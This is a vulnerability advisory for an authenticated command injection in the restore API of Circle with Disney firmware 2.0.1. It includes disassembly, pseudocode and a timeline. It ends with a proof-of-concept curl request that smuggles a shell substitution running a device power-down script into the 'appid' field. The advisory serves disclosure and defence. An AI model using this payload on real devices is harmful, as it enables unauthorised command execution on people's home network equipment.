### SummaryAn exploitable vulnerability exists in the /api/CONFIG/restore functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause an OS command injection. An attacker can send an HTTP request trigger this vulnerability.### Tested VersionsCircle with Disney 2.0.1### Product URLshttps://meetcircle.com/### CVSSv3 Score9.9 – CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H### CWECWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')### DetailsThe vulnerable code exists in the restore api handler of the "apid" deamon ("/api/CONFIG/restore"), function `sub_417528`:“`.text:004176A4 loc_4176A4:.text:004176A4 lw $v0, (dword_44CB3C – 0x450000)($v0).text:004176A8 nop.text:004176AC beqz $v0, loc_4177A8.text:004176B0 li $v0, 1.text:004176B4 beq $s4, $v0, loc_417860.text:004176B8 lui $a0, 0x43.text:004176BC jal strlen.text:004176C0 addiu $a0, $s6, (byte_44CC40 – 0x450000).text:004176C4 sltiu $v0, 0x14.text:004176C8 bnez $v0, loc_4177A8.text:004176CC lui $v0, 0x45.text:004176D0 la $v0, byte_44CC40 # appid.text:004176D4 sw $v0, 0x200+var_1F0($sp).text:004176D8 lui $a2, 0x43.text:004176DC li $v0, 0x42.text:004176E0 lui $a3, 0x43.text:004176E4 addiu $a0, $sp, 0x200+var_148.text:004176E8 li $a1, 0x80.text:004176EC la $a2, aSrestore_backu # "%srestore_backup.sh /tmp/postfile.bin %s %d".text:004176F0 la $a3, aMntSharesUs_19 # "/mnt/shares/usr/bin/scripts/".text:004176F4 jal snprintf.text:004176F8 sw $v0, 0x200+var_1EC($sp).text:004176FC jal system.text:00417700 addiu $a0, $sp, 0x200+var_148“`Looking at the pseudocode of the whole function, we see the following:“`if (memcmp(request_url, "/api/CONFIG/restore", 18) == 0) if (stat("/mnt/shares/usr/bin/app_list") == 0) if (auth_token[0] != 0 && check_token(auth_token)) if (strlen(appid) > 20) { snprintf(cmd, 128, "%srestore_backup.sh /tmp/postfile.bin %s %d", "/mnt/shares/usr/bin/scripts/", appid, 66); system(cmd); }“`As we can see the `appid` parameter, coming from the user as a multipart parameter, is passed direcly to `system` call without any sanitization leading in that way to command injection. This API is accessible for authenticated users.### Timeline* 2017-08-29 – Vendor Disclosure* 2017-10-31 – Public Release
The following proof of concept shows how to execute the "power_down.sh" script on the device. An attacker needs use a valid token in order to trigger the vulnerability.$ sAppid=$(python -c 'print "$(/etc/circle/power_down.sh)".ljust(20, "x")');$ touch empty$ curl -k "https://${sIP}:4567/api/CONFIG/restore" -F "token=${sToken}" -F "appid=${sAppid}" -F "upload=@empty"
